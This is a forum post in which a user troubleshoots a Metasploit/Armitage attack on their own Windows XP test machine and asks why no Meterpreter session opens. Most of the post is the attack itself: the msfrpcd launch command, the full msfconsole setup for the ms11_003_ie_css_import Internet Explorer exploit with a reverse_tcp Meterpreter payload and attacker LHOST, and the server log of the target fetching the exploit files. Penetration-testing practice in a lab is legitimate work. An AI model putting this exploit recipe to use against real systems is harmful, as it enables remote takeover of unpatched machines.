Hey,guys. I really hope somebody could help me out here.
I am running linux, Ubuntu 10.04
I have mysql installed and database msf3 configured.
I have the metsaploit framework installed
I have armitage installed.
I run the msfrpc daemon: (with no SSL and type Basic)
sudo msfrpcd -f -U msf -P test -a 127.0.0.1 -t Basic -S
I get the following output:
[*] XMLRPC starting on 127.0.0.1:55553 (NO SSL):Basic...
[*] XMLRPC ready at 2011-09-02 13:20:16 -0500.
I assume everything is good here then I run gksudo armitage
Uncheck SSL and select mysql
I hit Connect, Armitage loads, I do an nmap on my IP range. See the target computer I have that i'm testing
My target PC is a Dell, Pentium 4 Processor, running Windows XP Pro SP3 with IE6
Then I select exploit:
ms11_003_ie_css_import
I edit the following settings to the following values:
SRVPORT:80
URIPATH: /
*LPORT: 443
I put an asterisk by the last setting because I ran the exploit with the default port (I believe 4444, and then with 443, and then again with 23)
Every time I changed the port number I terminated and restarted msfrpcd and armitage
With each time I get the same results: (after the target logs onto the IP address in IE6)
msf > use exploit/windows/browser/ms11_003_ie_css_import
msf > set SSLVersion SSL3
SSLVersion => SSL3
msf exploit(ms11_003_ie_css_import) > set LHOST 10.12.5.48
LHOST => 10.12.5.48
msf exploit(ms11_003_ie_css_import) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(ms11_003_ie_css_import) > set LPORT 443
LPORT => 443
msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms11_003_ie_css_import) > set SSL 0
SSL => 0
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set TARGET 0
TARGET => 0
msf exploit(ms11_003_ie_css_import) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf exploit(ms11_003_ie_css_import) > set URIPATH /
URIPATH => /
msf exploit(ms11_003_ie_css_import) > set OBFUSCATE 1
OBFUSCATE => 1
msf exploit(ms11_003_ie_css_import) > exploit -j
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://10.12.5.48:80/
[*] Server started.
[*] 10.12.5.114:2156 Received request for "/"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import redirect
[*] 10.12.5.114:2156 Received request for "/C3QEIDn.html"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import HTML
[*] 10.12.5.114:2156 Received request for "/generic-1314988683.dll"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import .NET DLL
[*] 10.12.5.114:2156 Received request for "/iexplore.exe.config"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS
[*] 10.12.5.114:2156 Received request for "/\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS
Everything runs except for the metrepeter session, I don't compromise my target I don't get red lightning bolts surrounding the image of the target IP.
It seems like I'm doing everything that should be done. What am I doing wrong.
I changed the port numbers because I believe it may be that the network is blocking certain ports. But 443 and 23 should work